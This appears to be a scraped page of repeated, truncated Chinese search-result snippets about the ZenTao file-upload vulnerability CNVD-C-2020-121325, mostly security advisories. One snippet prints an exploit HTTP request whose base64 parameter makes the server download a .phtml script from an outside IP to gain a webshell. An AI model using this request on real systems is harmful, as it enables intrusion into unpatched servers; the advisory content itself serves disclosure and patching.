2020年10月26日,360CERT监测发现禅道官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325,漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件以及获得系统管理权限。 对此,360CERT建议广大用户及时将禅道升级到最新版本。与此同时,请做好资产自查以及预...
近日,禅道官方发布了开源版12.4.3的更新公告,本次安全更新修复了一个任意文件上传漏洞,漏洞编号:CNVD-C-2020-121325。 恶意攻击者登录后台后,可通过fopen/fread/fwrite方法结合ftp、http、file等协议读取或上传任意文件,成功利用该漏洞可以获取系统敏感文件以及造成任意代码执行。 禅道项目管理软件是国产的开源项目管理软...
CNVD-C-2020-121325文件上传漏洞主要影响以下禅道版本: 禅道开源版<=12.4.2,建议升级到禅道12.4.3以上版本 利用条件:需要后台权限 Copy GET /zentao/client-download-1-aHR0cDovLzEyMC43OC4xMjkuMjA5OjgwODEveC5waHRtbA==-macOSzip1.html HTTP/1.1Host: 127.0.0.1:8012User-Agent: Mozilla/5.0 (Android 9.0;...
禅道cnvd_2020_121325 背景: 禅道项目管理软件是国产的开源项目管理软件。 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。 漏洞编号: cnvd_2020_121325 影响版本: <=12.4.2 环境搭建: 1,启动...
2020年10月26日,阿里云应急响应中心监测到 ZenTaoPMS 官方修复 CNVD-C-2020-121325文件上传漏洞。 漏洞描述 ZenTaoPMS是一款中小型企业项目管理工具,集产品管理、项目管理、测试管理于一身,同时包含事务管理、组织管理等诸多功能。近日ZenTaoPMS 官方修复CNVD-C-2020-121325文件上传漏洞。经过身份认证的攻击者可构造恶意请求...
标签:CNVD-C-2020-121325 漏洞 【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用 组件介绍1 基本信息ZenTaoPMS(ZenTao Project Management System),中文名为禅道项目管理软件。ZenTaoPMS是用于解决众多企业在管理过程中出现的混乱,无序的… Further_eye...
1. 操作系统:Kali Linux 或者 Windows 2. 工具:nmap,gobuster maptnh 62643围观·2·22023-09-20 OSCP系列靶场-Esay-Monitoring原创 网络安全 提权思路: 发现suid的check文件 →msf之check插件漏洞利用 杳若 93743围观2023-09-20 详解Meow原创 Web安全
2020年10月26日,360CERT监测发现 禅道官方 发布了 文件上传漏洞 的风险通告,该漏洞编号为 CNVD-C-2020-121325 ,漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件...
2020年10月26日,360CERT监测发现禅道官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325,漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件以及获得系统管理权限。 对此,360CERT建议广大用户及时将禅道升级到最新版本。与此同时,请做好资产自查以及预...
2020年10月26日,360CERT监测发现禅道官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325,漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件以及获得系统管理权限。 对此,360CERT建议广大用户及时将禅道升级到最新版本。与此同时,请做好资产自查以及预...